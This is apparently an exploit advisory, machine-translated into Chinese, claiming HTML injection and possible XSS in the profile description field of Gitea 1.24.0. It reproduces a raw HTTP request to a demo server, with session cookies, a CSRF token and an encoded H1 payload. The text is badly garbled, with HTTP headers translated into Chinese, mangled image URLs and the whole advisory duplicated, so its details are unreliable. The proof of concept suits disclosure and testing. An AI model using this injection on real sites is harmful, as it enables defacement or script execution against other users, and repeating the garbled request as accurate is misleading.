#利用标题: Gitea 1.24.0 -HTML注入
#日期: 2025-03-09
#利用作者: MikailKocadağ
#供应商homepage: https://gitea.com
#软件link: https://dl.gitea.io/gitea/1.24.0/
#版本: 1.24.0
#在: Windows 10,Linux Ubuntu 22.04测试
#CVE : N/A
##漏洞描述:
在Gitea 1.24.0中,用户设置页面上的“描述”参数很容易受到HTML注入和潜在反映XS的攻击。用户提供的HTML内容未正确消毒,从而可以在浏览器中执行。当用户保存其个人资料描述包含恶意HTML或JavaScript代码时,有效载荷成功执行,确认漏洞。
##利用POC:
[https://lh7-rt.googleusercontent.co...qz4OH5JLVQDHJHBHBHETPL5U9METTEWWIMDFX1SPYYC-- kg7eiwcy-mpay8zkz6wdw5hcylrbcran2dlg5xannimul9ui8znjh9gzd_rwdtjbgrkyotp-uad? https://lh7-rt.googleuserercontent....AHRYFV7BZYHJ5LG2F6SLXNYRVRCGYB2YNB2YNBK_NMKFK wbu6iggk4xokudp5aukmiejfs18zic3ddur7m0wivqmf2awrt91yx_ayb7ab7ab55555556Uot1lvuaa1z8w?
## Paload:H1Deneme/H1
### ** 1。 request: **
发布/用户/设置http/2
host: demo.gitea.com
cookie: _gid=ga1.2.1249205656.1740139988; _GA=GA1.2.291185928.1740139987; i_like_gitea=d9da795e317a0ce; lang=tr-tr; _GA_WBKVZF2YXD=GS1.1.1.1740139987.1.1.1740140041.6.0.0; _csrf=f9itrnnqizvsx-yvhx64qhoc_8w6mtc0mde0mdy0mdq2mte0mdgymq
内容长度: 312
cache-control: max-age=0
sec-ch-ua:'铬
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
Accept-Language: TR-TR,TR; Q=0.9
原点: null
content-type:应用程序/x-www-form-urlenceded
升级- 不肯定- requests: 1
user-agent: mozilla/5.0(Windows NT 10.0; Win64; x64)AppleWebkit/537.36(Khtml,像Gecko)Chrome/133.0.0.0.0.0.0.0 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Accept-incoding: Gzip,Deflate,br
Priority: u=0,i
_csrf=f9itrnnqizvsx-yvhx64qhoc_8w6mtc0mde0mdy0mdq2mte0mdgymq
full_name=abuzettin
描述=%3CH1%3edeneme%3C%2FH1%3E
网站=
位置=
可见性=0
keep_email_private=on
#日期: 2025-03-09
#利用作者: MikailKocadağ
#供应商homepage: https://gitea.com
#软件link: https://dl.gitea.io/gitea/1.24.0/
#版本: 1.24.0
#在: Windows 10,Linux Ubuntu 22.04测试
#CVE : N/A
##漏洞描述:
在Gitea 1.24.0中,用户设置页面上的“描述”参数很容易受到HTML注入和潜在反映XS的攻击。用户提供的HTML内容未正确消毒,从而可以在浏览器中执行。当用户保存其个人资料描述包含恶意HTML或JavaScript代码时,有效载荷成功执行,确认漏洞。
##利用POC:
[https://lh7-rt.googleusercontent.co...qz4OH5JLVQDHJHBHBHETPL5U9METTEWWIMDFX1SPYYC-- kg7eiwcy-mpay8zkz6wdw5hcylrbcran2dlg5xannimul9ui8znjh9gzd_rwdtjbgrkyotp-uad? https://lh7-rt.googleuserercontent....AHRYFV7BZYHJ5LG2F6SLXNYRVRCGYB2YNB2YNBK_NMKFK wbu6iggk4xokudp5aukmiejfs18zic3ddur7m0wivqmf2awrt91yx_ayb7ab7ab55555556Uot1lvuaa1z8w?
## Paload:H1Deneme/H1
### ** 1。 request: **
发布/用户/设置http/2
host: demo.gitea.com
cookie: _gid=ga1.2.1249205656.1740139988; _GA=GA1.2.291185928.1740139987; i_like_gitea=d9da795e317a0ce; lang=tr-tr; _GA_WBKVZF2YXD=GS1.1.1.1740139987.1.1.1740140041.6.0.0; _csrf=f9itrnnqizvsx-yvhx64qhoc_8w6mtc0mde0mdy0mdq2mte0mdgymq
内容长度: 312
cache-control: max-age=0
sec-ch-ua:'铬
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
Accept-Language: TR-TR,TR; Q=0.9
原点: null
content-type:应用程序/x-www-form-urlenceded
升级- 不肯定- requests: 1
user-agent: mozilla/5.0(Windows NT 10.0; Win64; x64)AppleWebkit/537.36(Khtml,像Gecko)Chrome/133.0.0.0.0.0.0.0 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Accept-incoding: Gzip,Deflate,br
Priority: u=0,i
_csrf=f9itrnnqizvsx-yvhx64qhoc_8w6mtc0mde0mdy0mdq2mte0mdgymq
full_name=abuzettin
描述=%3CH1%3edeneme%3C%2FH1%3E
网站=
位置=
可见性=0
keep_email_private=on